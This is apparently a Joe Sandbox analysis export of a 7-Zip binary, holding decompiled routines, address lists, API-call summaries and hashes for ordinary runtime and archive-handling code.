                                                                                                                                    0x00441b23
                                                                                                                                    0x00441b2d
                                                                                                                                    0x00441b32
                                                                                                                                    0x00000000
                                                                                                                                    0x004419dc
                                                                                                                                    0x004419eb
                                                                                                                                    0x004419fe
                                                                                                                                    0x00441a06
                                                                                                                                    0x00441a0c
                                                                                                                                    0x00441a0f
                                                                                                                                    0x00441a12
                                                                                                                                    0x00441a12
                                                                                                                                    0x00441a12
                                                                                                                                    0x00441a1c
                                                                                                                                    0x00000000
                                                                                                                                    0x00441a1c
                                                                                                                                    0x0044196c
                                                                                                                                    0x0044196f
                                                                                                                                    0x00441972
                                                                                                                                    0x00441975
                                                                                                                                    0x0044197b
                                                                                                                                    0x00441981
                                                                                                                                    0x00441984
                                                                                                                                    0x00441988
                                                                                                                                    0x00441988
                                                                                                                                    0x00441a21
                                                                                                                                    0x00441a21
                                                                                                                                    0x00441a25
                                                                                                                                    0x00441a28
                                                                                                                                    0x00441a2b
                                                                                                                                    0x00441a2c
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 0044192A
                                                                                                                                    • __aulldiv.LIBCMT ref: 00441AF2
                                                                                                                                    • __aulldiv.LIBCMT ref: 00441B04
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 004426C8
                                                                                                                                      • Part of subcall function 00443BAF: __EH_prolog.LIBCMT ref: 00443BB4
                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,00000000,00000004,00000004,00010000,?,00000001), ref: 004420FC
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00442166
                                                                                                                                    • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF,?,?,00000004,00000004,00010000,?,00000001), ref: 0044241C
                                                                                                                                      • Part of subcall function 00440F0D: __EH_prolog.LIBCMT ref: 00440F12
                                                                                                                                      • Part of subcall function 00467B10: SetEvent.KERNEL32(00000000,00410FDF), ref: 00467B13
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 004421AA
                                                                                                                                      • Part of subcall function 00441083: EnterCriticalSection.KERNEL32(?,00000000,?,00442557,0000001A,?,?,?,?,00000004,00000004,00010000,?,00000001), ref: 0044108B
                                                                                                                                      • Part of subcall function 00441083: LeaveCriticalSection.KERNEL32(?), ref: 004410AE
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0044277B
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0044281A
                                                                                                                                      • Part of subcall function 00442DE5: __EH_prolog.LIBCMT ref: 00442DEA
                                                                                                                                      • Part of subcall function 00442E79: __EH_prolog.LIBCMT ref: 00442E7E
                                                                                                                                      • Part of subcall function 0044296D: __EH_prolog.LIBCMT ref: 00442972
                                                                                                                                      • Part of subcall function 0044296D: DeleteCriticalSection.KERNEL32(?,?,?,004425CF,00000004,00000004,00010000,?,00000001), ref: 00442996
                                                                                                                                      • Part of subcall function 0044395A: __EH_prolog.LIBCMT ref: 0044395F
                                                                                                                                      • Part of subcall function 0044395A: DeleteCriticalSection.KERNEL32(?,?,?,004425DE,00000004,00000004,00010000,?,00000001), ref: 00443976
                                                                                                                                      • Part of subcall function 0043F571: __EH_prolog.LIBCMT ref: 0043F576
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$H_prolog$Leave$DeleteEnter__aulldiv$EventMultipleObjectsWait
                                                                                                                                    • String ID: D
                                                                                                                                    • API String ID: 1344393993-2746444292
                                                                                                                                    • Opcode ID: b047309ef7205ff0cd7ae07785126dab8f23e899f198fd2aad64151a90333fdc
                                                                                                                                    • Instruction ID: b7ea9ee86155e0a7c7e569c876f0c1e31397adaa9b36ed63c9e7592aed198d63
                                                                                                                                    • Opcode Fuzzy Hash: b047309ef7205ff0cd7ae07785126dab8f23e899f198fd2aad64151a90333fdc
                                                                                                                                    • Instruction Fuzzy Hash: A7B27030D00288DFEB15EFA4C994BDDBBB0AF19308F54809EE54967292DB785E49CF19
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00471C24 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 46%
                                                                                                                                    			E00471C24(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr* _t4;
				intOrPtr* _t7;
				_Unknown_base(*)()* _t11;
				void* _t14;
				struct HINSTANCE__* _t15;
				void* _t17;

				_t14 = 0;
				_t17 =  *0x493850 - _t14; // 0x0
				if(_t17 != 0) {
					L4:
					_t4 =  *0x493854; // 0x0
					if(_t4 != 0) {
						_t14 =  *_t4();
						if(_t14 != 0) {
							_t7 =  *0x493858; // 0x0
							if(_t7 != 0) {
								_t14 =  *_t7(_t14);
							}
						}
					}
					return  *0x493850(_t14, _a4, _a8, _a12);
				}
				_t15 = LoadLibraryA("user32.dll");
				if(_t15 == 0) {
					L10:
					return 0;
				}
				_t11 = GetProcAddress(_t15, "MessageBoxA");
				 *0x493850 = _t11;
				if(_t11 == 0) {
					goto L10;
				} else {
					 *0x493854 = GetProcAddress(_t15, "GetActiveWindow");
					 *0x493858 = GetProcAddress(_t15, "GetLastActivePopup");
					goto L4;
				}
			}









                                                                                                                                    0x00471c25
                                                                                                                                    0x00471c27
                                                                                                                                    0x00471c2f
                                                                                                                                    0x00471c73
                                                                                                                                    0x00471c73
                                                                                                                                    0x00471c7a
                                                                                                                                    0x00471c7e
                                                                                                                                    0x00471c82
                                                                                                                                    0x00471c84
                                                                                                                                    0x00471c8b
                                                                                                                                    0x00471c90
                                                                                                                                    0x00471c90
                                                                                                                                    0x00471c8b
                                                                                                                                    0x00471c82
                                                                                                                                    0x00000000
                                                                                                                                    0x00471c9f
                                                                                                                                    0x00471c3c
                                                                                                                                    0x00471c40
                                                                                                                                    0x00471ca9
                                                                                                                                    0x00000000
                                                                                                                                    0x00471ca9
                                                                                                                                    0x00471c4e
                                                                                                                                    0x00471c52
                                                                                                                                    0x00471c57
                                                                                                                                    0x00000000
                                                                                                                                    0x00471c59
                                                                                                                                    0x00471c67
                                                                                                                                    0x00471c6e
                                                                                                                                    0x00000000
                                                                                                                                    0x00471c6e

                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryA.KERNEL32(user32.dll,?,00000000,00000000,00470D65,?,Microsoft Visual C++ Runtime Library,00012010,?,0047CC5C,?,0048A174,?,?,?,Runtime Error!Program: ), ref: 00471C36
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00471C4E
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00471C5F
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00471C6C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                                                    • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                                                                                    • API String ID: 2238633743-4044615076
                                                                                                                                    • Opcode ID: c93d45f6ab12ccfc8be7b15ae8812bf4fd7e40829fe0effbe83a31a9d7762021
                                                                                                                                    • Instruction ID: ea4433a42688f02017ac68f8dd25db1f7bd77ae58eff3a6fbc345d1a27d7865b
                                                                                                                                    • Opcode Fuzzy Hash: c93d45f6ab12ccfc8be7b15ae8812bf4fd7e40829fe0effbe83a31a9d7762021
                                                                                                                                    • Instruction Fuzzy Hash: F1018471740311AF8722EFF99CC49AB7BE8EBA6741314847FB10DD2230DB7889418B69
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004311FE Relevance: 8.7, APIs: 3, Strings: 1, Instructions: 1676COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 81%
                                                                                                                                    			E004311FE(intOrPtr __ecx, void* __edx) {
				signed int _t1032;
				signed int _t1034;
				signed int _t1037;
				signed int _t1040;
				signed int _t1041;
				intOrPtr* _t1049;
				signed int _t1050;
				signed int _t1051;
				signed int _t1058;
				signed int* _t1059;
				signed int _t1062;
				signed int _t1076;
				signed int* _t1092;
				signed int _t1093;
				signed int _t1113;
				signed int _t1114;
				signed int _t1125;
				signed int _t1127;
				intOrPtr _t1141;
				intOrPtr _t1144;
				signed int _t1149;
				signed int _t1153;
				intOrPtr _t1158;
				signed int _t1165;
				signed int _t1179;
				signed int _t1181;
				signed int _t1188;
				intOrPtr _t1193;
				signed int _t1197;
				signed int _t1206;
				void* _t1207;
				signed int _t1212;
				signed int _t1213;
				signed int _t1217;
				signed int _t1232;
				signed int _t1235;
				signed int _t1237;
				signed int _t1238;
				signed int _t1249;
				signed int* _t1254;
				signed int _t1255;
				signed int _t1268;
				signed int _t1271;
				signed int _t1272;
				signed int _t1286;
				signed int _t1287;
				signed int _t1298;
				intOrPtr _t1301;
				signed int _t1305;
				signed int _t1306;
				signed int _t1312;
				signed int _t1321;
				signed int _t1322;
				signed int _t1340;
				signed int _t1343;
				intOrPtr _t1344;
				intOrPtr _t1345;
				signed int _t1347;
				signed int _t1350;
				signed int _t1363;
				intOrPtr _t1364;
				signed int _t1367;
				signed int _t1371;
				signed int _t1372;
				intOrPtr _t1391;
				signed int _t1392;
				signed int _t1393;
				intOrPtr _t1409;
				signed int _t1414;
				signed int _t1415;
				signed int _t1417;
				void* _t1420;
				intOrPtr _t1428;
				signed int _t1429;
				signed int _t1431;
				signed int _t1434;
				intOrPtr _t1436;
				intOrPtr _t1438;
				signed int _t1441;
				void* _t1445;
				intOrPtr _t1448;
				intOrPtr _t1459;
				intOrPtr _t1543;
				intOrPtr _t1547;
				signed int _t1548;
				signed int _t1555;
				signed int _t1573;
				signed int* _t1577;
				signed int _t1589;
				intOrPtr _t1601;
				intOrPtr _t1627;
				intOrPtr _t1651;
				intOrPtr _t1657;
				signed int _t1667;
				intOrPtr* _t1694;
				signed int _t1701;
				signed int _t1706;
				signed int _t1708;
				intOrPtr* _t1709;
				signed int _t1715;
				signed int _t1719;
				signed int _t1724;
				signed int _t1728;
				intOrPtr _t1729;
				signed int _t1730;
				intOrPtr _t1733;
				intOrPtr _t1738;
				signed int* _t1740;
				intOrPtr* _t1742;
				signed int _t1745;
				signed int _t1746;
				void* _t1751;
				intOrPtr _t1757;
				intOrPtr* _t1758;
				signed int _t1759;
				intOrPtr _t1760;
				signed int _t1763;
				intOrPtr _t1764;
				signed int _t1765;
				intOrPtr* _t1767;
				signed int _t1768;
				signed int _t1769;
				signed int _t1771;
				signed int _t1774;
				signed int _t1775;
				signed int _t1776;
				intOrPtr* _t1777;
				intOrPtr _t1779;
				signed int _t1780;
				intOrPtr* _t1782;
				void* _t1785;
				void* _t1787;
				void* _t1788;
				void* _t1790;
				void* _t1824;
				void* _t1826;

				L0046B890(0x477a16, _t1785);
				_t1788 = _t1787 - 0x4c0;
				 *((intOrPtr*)(_t1785 - 0x98)) = __ecx;
				_t1448 =  *((intOrPtr*)(_t1785 + 0x1c));
				_t1445 = __edx;
				_t1032 =  *(_t1448 + 0x10);
				_t1728 =  *(_t1448 + 0x14);
				 *(_t1785 - 0x70) = _t1032;
				 *(_t1785 - 0x6c) = _t1728;
				_t1745 = 0;
				if((_t1032 | _t1728) == 0) {
					 *(_t1785 - 0x70) = 1;
					 *(_t1785 - 0x6c) = _t1745;
				}
				if(_t1445 == _t1745) {
					_t1729 = 0;
					_t1034 = 0;
					__eflags = 0;
				} else {
					_t1729 =  *((intOrPtr*)(_t1445 + 0x138));
					_t1034 =  *((intOrPtr*)(_t1445 + 0x13c));
				}
				if(_t1034 > _t1745 || _t1729 > _t1745) {
					if( *((char*)(_t1448 + 0x21)) != 0) {
						goto L9;
					}
					_push(_t1745);
					_push(_t1034);
					_push(_t1729);
					_push(_t1745);
					_push(_t1745);
					_t1076 = L00432A5E( *((intOrPtr*)(_t1785 - 0x98)),  *(_t1785 + 0x14));
					if(_t1076 != _t1745) {
						goto L286;
					}
					goto L9;
				} else {
					L9:
					E00404AD0(_t1785 - 0xd4, 4);
					 *((intOrPtr*)(_t1785 - 0xd4)) = 0x47a668;
					 *(_t1785 - 4) = _t1745;
					E00404AD0(_t1785 - 0xb4, 0xc);
					 *((intOrPtr*)(_t1785 - 0xb4)) = 0x47b41c;
					 *(_t1785 - 0x26) =  *(_t1785 - 0x26) & 0x00000000;
					_t1757 =  *((intOrPtr*)(_t1785 + 8));
					 *(_t1785 - 4) = 1;
					 *(_t1785 - 0x54) = _t1745;
					 *(_t1785 - 0x50) = _t1745;
					 *(_t1785 - 0x78) = _t1745;
					 *(_t1785 - 0x74) = _t1745;
					if(_t1445 == _t1745) {
						L43:
						_t1730 =  *(_t1757 + 8);
						 *(_t1785 - 0x34) = _t1745;
						 *(_t1785 - 0x30) = _t1745;
						 *(_t1785 - 0x10) = _t1745;
						if(_t1730 <= _t1745) {
							L55:
							_t1037 =  *(_t1785 - 0x74);
							_t1824 = _t1037 -  *(_t1785 - 0x30);
							if(_t1824 >= 0 && (_t1824 > 0 ||  *(_t1785 - 0x78) >  *(_t1785 - 0x34))) {
								 *(_t1785 - 0x30) = _t1037;
								 *(_t1785 - 0x34) =  *(_t1785 - 0x78);
							}
							_t1826 =  *(_t1785 - 0x30) - _t1745;
							if(_t1826 <= 0 && (_t1826 < 0 ||  *(_t1785 - 0x34) < 0x10000)) {
								 *(_t1785 - 0x34) = 0x10000;
								 *(_t1785 - 0x30) = _t1745;
							}
							_t1758 =  *((intOrPtr*)(_t1785 + 0x18));
							_t1040 =  *((intOrPtr*)( *_t1758 + 0xc))(_t1758,  *(_t1785 - 0x54),  *(_t1785 - 0x50));
							if(_t1040 == _t1745) {
								_push(0x38);
								_t1041 = L004079F2();
								 *(_t1785 - 0x68) = _t1041;
								__eflags = _t1041 - _t1745;
								 *(_t1785 - 4) = 2;
								if(_t1041 == _t1745) {
									_t1746 = 0;
									__eflags = 0;
								} else {
									_t1746 = L0040F3E5(_t1041);
								}
								__eflags = _t1746;
								 *(_t1785 - 0x68) = _t1746;
								 *(_t1785 - 4) = 1;
								 *(_t1785 - 0x74) = _t1746;
								if(_t1746 != 0) {
									 *((intOrPtr*)( *_t1746 + 4))(_t1746);
								}
								_push(1);
								 *(_t1785 - 4) = 3;
								L0040F478(_t1746, _t1758);
								L0043333A(_t1785 - 0x2cc, __eflags);
								__eflags =  *(_t1785 - 0xac);
								 *(_t1785 - 4) = 4;
								if( *(_t1785 - 0xac) == 0) {
									L72:
									E00405B9F(_t1785 - 0x4c);
									 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
									 *(_t1785 - 4) = 5;
									_t1759 = 4;
									do {
										L004335AA(_t1785 - 0xe8);
										_push(_t1785 - 0xe8);
										 *(_t1785 - 4) = 6;
										L004336E2(_t1785 - 0x4c);
										 *(_t1785 - 4) = 5;
										E00408604(_t1785 - 0xe8);
										_t1759 = _t1759 - 1;
										__eflags = _t1759;
									} while (_t1759 != 0);
									_t1049 =  *((intOrPtr*)(_t1785 + 0x1c));
									_t1760 =  *_t1049;
									 *(_t1785 - 0x11) =  *((intOrPtr*)(_t1049 + 8));
									__eflags =  *((intOrPtr*)(_t1760 + 8)) - 1;
									if( *((intOrPtr*)(_t1760 + 8)) != 1) {
										L76:
										_t175 = _t1785 - 0x11;
										 *_t175 =  *(_t1785 - 0x11) & 0x00000000;
										__eflags =  *_t175;
										L77:
										_t1459 =  *((intOrPtr*)(_t1785 + 8));
										 *(_t1785 - 0x10) =  *(_t1785 - 0x10) & 0x00000000;
										__eflags =  *(_t1459 + 8);
										if( *(_t1459 + 8) <= 0) {
											L94:
											 *(_t1785 - 0xa0) =  *(_t1785 - 0xa0) & 0x00000000;
											__eflags =  *(_t1785 - 0x26);
											if(__eflags == 0) {
												L109:
												_push(0);
												_t1050 = L0042F495( *((intOrPtr*)(_t1785 + 0xc)), __eflags,  *(_t1785 + 0x14));
												__eflags = _t1050;
												 *(_t1785 + 0x14) = _t1050;
												if(_t1050 == 0) {
													_t1051 = L0042F522( *((intOrPtr*)(_t1785 + 0xc)));
													__eflags = _t1051;
													 *(_t1785 + 0x14) = _t1051;
													if(_t1051 == 0) {
														 *((intOrPtr*)(_t1746 + 0x18)) = 0;
														 *(_t1785 - 0x24) = 0;
														 *((intOrPtr*)(_t1746 + 0x1c)) = 0;
														 *(_t1785 - 0x2c) = 0;
														do {
															_t1762 =  *(_t1785 - 0x2c);
															 *((intOrPtr*)(_t1785 - 0x58)) =  *((intOrPtr*)( *((intOrPtr*)(_t1785 - 0x40)) +  *(_t1785 - 0x2c) * 4));
															E00428499(_t1785 - 0x1b4);
															 *(_t1785 - 4) = 0xe;
															__eflags = L0043351E( *(_t1785 - 0x2c));
															if(__eflags == 0) {
																E00428562(_t1785 - 0x1b4,  *((intOrPtr*)( *((intOrPtr*)(_t1785 + 0x1c)))));
															} else {
																_push(_t1785 - 0x1b4);
																_t1730 =  *((intOrPtr*)( *((intOrPtr*)(_t1785 + 0x1c)) + 9));
																L00433001( *((intOrPtr*)( *((intOrPtr*)(_t1785 + 0x1c)))), _t1730, __eflags);
															}
															_t1058 = L00433524(_t1762);
															__eflags = _t1058;
															if(_t1058 == 0) {
																_t1059 =  *(_t1785 - 0x184);
																 *(_t1785 - 0x188) =  *(_t1785 - 0x188) & 0x00000000;
																 *(_t1785 - 0x180) =  *(_t1785 - 0x180) & 0x00000000;
																 *_t1059 =  *_t1059 & 0x00000000;
																__eflags =  *_t1059;
															} else {
																__eflags =  *(_t1785 - 0x188);
																if(__eflags == 0) {
																	_t1372 =  *(_t1785 - 0xa0);
																	__eflags = _t1372;
																	if(__eflags != 0) {
																		__eflags = _t1372 + 8;
																		E00401E26(_t1785 - 0x184, _t1372 + 8);
																	}
																	 *(_t1785 - 0x188) = 1;
																}
															}
															_push(_t1785 - 0x1b4);
															E004283DB(_t1785 - 0x4cc, __eflags);
															_t1062 =  *(_t1785 - 0x24);
															 *(_t1785 - 4) = 0xf;
															__eflags = _t1062 -  *(_t1785 - 0xac);
															if(_t1062 >=  *(_t1785 - 0xac)) {
																L168:
																_t1763 =  *( *((intOrPtr*)(_t1785 - 0x58)) + 8);
																__eflags = _t1763;
																 *(_t1785 - 0x20) = _t1763;
																if(_t1763 == 0) {
																	goto L225;
																}
																E00404AD0(_t1785 - 0x138, 0x14);
																 *((intOrPtr*)(_t1785 - 0x138)) = 0x47b3fc;
																 *(_t1785 - 4) = 0x1c;
																E0040867E(_t1785 - 0x138, _t1763);
																__eflags =  *(_t1785 - 0x6c);
																if( *(_t1785 - 0x6c) > 0) {
																	L171:
																	 *(_t1785 - 0x9c) = 1;
																	L173:
																	 *(_t1785 - 0x10) =  *(_t1785 - 0x10) & 0x00000000;
																	__eflags = _t1763;
																	if(_t1763 <= 0) {
																		L176:
																		L0043375E(_t1785 - 0x138, _t1730, 0x432eb7, _t1785 - 0x9c);
																		E00404AD0(_t1785 - 0xfc, 4);
																		 *((intOrPtr*)(_t1785 - 0xfc)) = 0x47ab80;
																		 *(_t1785 - 4) = 0x1d;
																		E0040867E(_t1785 - 0xfc, _t1763);
																		__eflags = _t1763;
																		if(_t1763 <= 0) {
																			L179:
																			 *(_t1785 - 0x10) =  *(_t1785 - 0x10) & 0x00000000;
																			__eflags = _t1763;
																			if(_t1763 <= 0) {
																				L224:
																				 *(_t1785 - 4) = 0x1c;
																				E00408604(_t1785 - 0xfc);
																				 *(_t1785 - 4) = 0xf;
																				E00408604(_t1785 - 0x138);
																				goto L225;
																			}
																			while(1) {
																				 *(_t1785 - 0x94) = 0;
																				 *(_t1785 - 0x90) = 0;
																				 *(_t1785 - 0xc0) = 0;
																				 *((intOrPtr*)(_t1785 - 0xbc)) = 0;
																				 *((intOrPtr*)(_t1785 - 0xb8)) = 0;
																				E00401E9A(_t1785 - 0xc0, 3);
																				 *(_t1785 + 0x14) =  *(_t1785 + 0x14) & 0x00000000;
																				__eflags =  *(_t1785 - 0x10) - _t1763;
																				 *(_t1785 - 4) = 0x1e;
																				if( *(_t1785 - 0x10) >= _t1763) {
																					goto L198;
																				}
																				while(1) {
																					L183:
																					_t1555 =  *(_t1785 + 0x14);
																					_t1188 = _t1555;
																					asm("cdq");
																					__eflags = _t1730 -  *(_t1785 - 0x6c);
																					if(__eflags > 0) {
																						break;
																					}
																					if(__eflags < 0) {
																						L186:
																						_t1559 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1785 + 8)) + 0xc)) +  *( *((intOrPtr*)(_t1785 - 0xf0)) + (_t1555 +  *(_t1785 - 0x10)) * 4) * 4));
																						 *(_t1785 - 0x94) =  *(_t1785 - 0x94) +  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1785 + 8)) + 0xc)) +  *( *((intOrPtr*)(_t1785 - 0xf0)) + (_t1555 +  *(_t1785 - 0x10)) * 4) * 4)) + 0x20));
																						_t1193 =  *((intOrPtr*)(_t1785 + 0x1c));
																						asm("adc [ebp-0x90], edx");
																						_t1730 =  *(_t1785 - 0x90);
																						__eflags = _t1730 -  *((intOrPtr*)(_t1193 + 0x1c));
																						if(__eflags > 0) {
																							break;
																						}
																						if(__eflags < 0) {
																							L189:
																							__eflags =  *((char*)(_t1193 + 0x20));
																							if( *((char*)(_t1193 + 0x20)) == 0) {
																								L194:
																								 *(_t1785 + 0x14) =  *(_t1785 + 0x14) + 1;
																								__eflags =  *(_t1785 + 0x14) +  *(_t1785 - 0x10) -  *(_t1785 - 0x20);
																								if( *(_t1785 + 0x14) +  *(_t1785 - 0x10) <  *(_t1785 - 0x20)) {
																									continue;
																								}
																								break;
																							}
																							E00430E91(_t1559, _t1785 - 0x84);
																							__eflags =  *(_t1785 + 0x14);
																							 *(_t1785 - 4) = 0x1f;
																							if( *(_t1785 + 0x14) != 0) {
																								_t1730 =  *(_t1785 - 0xc0);
																								_t1197 = E0040807A(_t1730);
																								__eflags = _t1197;
																								if(_t1197 != 0) {
																									 *(_t1785 - 4) = 0x1e;
																									E00407A18( *(_t1785 - 0x84));
																									break;
																								}
																								L193:
																								 *(_t1785 - 4) = 0x1e;
																								E00407A18( *(_t1785 - 0x84));
																								goto L194;
																							}
																							E00401E26(_t1785 - 0xc0, _t1785 - 0x84);
																							goto L193;
																						}
																						_t1730 =  *(_t1785 - 0x94);
																						__eflags = _t1730 -  *((intOrPtr*)(_t1193 + 0x18));
																						if(_t1730 >  *((intOrPtr*)(_t1193 + 0x18))) {
																							break;
																						}
																						goto L189;
																					}
																					__eflags = _t1188 -  *(_t1785 - 0x70);
																					if(_t1188 >=  *(_t1785 - 0x70)) {
																						break;
																					}
																					goto L186;
																				}
																				__eflags =  *(_t1785 + 0x14) - 1;
																				if( *(_t1785 + 0x14) >= 1) {
																					L199:
																					_push(0x78);
																					_t1113 = L004079F2();
																					 *(_t1785 - 0x18) = _t1113;
																					__eflags = _t1113;
																					 *(_t1785 - 4) = 0x20;
																					if(_t1113 == 0) {
																						_t1114 = 0;
																						__eflags = 0;
																					} else {
																						_t1114 = E00429B31(_t1113);
																					}
																					__eflags = _t1114;
																					 *(_t1785 - 0x1c) = _t1114;
																					 *(_t1785 - 4) = 0x1e;
																					 *(_t1785 - 0x50) = _t1114;
																					if(_t1114 != 0) {
																						 *((intOrPtr*)( *_t1114 + 4))(_t1114);
																					}
																					_push( *(_t1785 + 0x14));
																					 *(_t1785 - 4) = 0x21;
																					E00429C75( *(_t1785 - 0x1c),  *((intOrPtr*)(_t1785 + 0x18)), ( *(_t1785 - 0x10) << 2) +  *((intOrPtr*)(_t1785 - 0xf0)));
																					E0042DB56(_t1785 - 0x3a4);
																					_push(_t1746);
																					_push( *((intOrPtr*)(_t1785 + 0x10)));
																					_t1768 =  *( *((intOrPtr*)(_t1785 + 0x10)) + 8);
																					 *(_t1785 - 4) = 0x22;
																					_push( *( *((intOrPtr*)(_t1785 + 0xc)) + 0x50));
																					_push(_t1785 - 0x3a4);
																					_push(_t1785 - 0x34);
																					_push(0);
																					_push( *(_t1785 - 0x1c));
																					_t1125 = L004279E7(_t1785 - 0x4cc, _t1730, __eflags);
																					__eflags = _t1125;
																					 *(_t1785 - 0x18) = _t1125;
																					if(__eflags != 0) {
																						 *(_t1785 - 4) = 0x21;
																						L0042B864(_t1785 - 0x3a4, __eflags);
																						_t1127 =  *(_t1785 - 0x1c);
																						 *(_t1785 - 4) = 0x1e;
																						__eflags = _t1127;
																						if(_t1127 != 0) {
																							 *((intOrPtr*)( *_t1127 + 8))(_t1127);
																						}
																						E00407A18( *(_t1785 - 0xc0));
																						 *(_t1785 - 4) = 0x1c;
																						E00408604(_t1785 - 0xfc);
																						 *(_t1785 - 4) = 0xf;
																						E00408604(_t1785 - 0x138);
																						 *(_t1785 - 4) = 0xe;
																						E00428A47(_t1785 - 0x4cc);
																						 *(_t1785 - 4) = 5;
																						E00428510(_t1785 - 0x1b4, __eflags);
																						 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
																						 *(_t1785 - 4) = 0x23;
																						E0040862D();
																						 *(_t1785 - 4) = 4;
																						E00408604(_t1785 - 0x4c);
																						 *(_t1785 - 4) = 3;
																						L0043353F(_t1785 - 0x2cc, __eflags);
																						__eflags = _t1746;
																						 *(_t1785 - 4) = 1;
																						if(_t1746 != 0) {
																							 *((intOrPtr*)( *_t1746 + 8))(_t1746);
																						}
																						 *(_t1785 - 4) =  *(_t1785 - 4) & 0x00000000;
																						E00408604(_t1785 - 0xb4);
																						 *(_t1785 - 4) =  *(_t1785 - 4) | 0xffffffff;
																						E00408604(_t1785 - 0xd4);
																						_t1076 =  *(_t1785 - 0x18);
																					} else {
																						_t1141 =  *((intOrPtr*)(_t1785 + 0x10));
																						while(1) {
																							__eflags = _t1768 -  *((intOrPtr*)(_t1141 + 8));
																							if(_t1768 >=  *((intOrPtr*)(_t1141 + 8))) {
																								break;
																							}
																							_t1730 =  *( *((intOrPtr*)(_t1141 + 0xc)) + _t1768 * 8);
																							 *((intOrPtr*)(_t1746 + 0x28)) =  *((intOrPtr*)(_t1746 + 0x28)) + _t1730;
																							asm("adc [edi+0x2c], ecx");
																							_t1768 = _t1768 + 1;
																						}
																						 *((intOrPtr*)(_t1746 + 0x20)) =  *((intOrPtr*)(_t1746 + 0x20)) + E00429826(_t1785 - 0x3a4);
																						_push(_t1785 - 0x3a4);
																						_t1144 =  *((intOrPtr*)(_t1785 + 0x10));
																						asm("adc [edi+0x24], edx");
																						_t693 = _t1144 + 0x3c; // 0x3c
																						L0042F063(_t693);
																						_t1769 = 0;
																						__eflags =  *(_t1785 + 0x14);
																						 *(_t1785 - 0x18) = 0;
																						if(__eflags <= 0) {
																							L221:
																							_t750 =  *((intOrPtr*)(_t1785 + 0x10)) + 0x50; // 0x50
																							E00415C6D(_t750,  *(_t1785 - 0x18));
																							_t1771 =  *(_t1785 - 0x10) +  *(_t1785 + 0x14);
																							 *(_t1785 - 4) = 0x21;
																							 *(_t1785 - 0x10) = _t1771;
																							L0042B864(_t1785 - 0x3a4, __eflags);
																							_t1149 =  *(_t1785 - 0x1c);
																							 *(_t1785 - 4) = 0x1e;
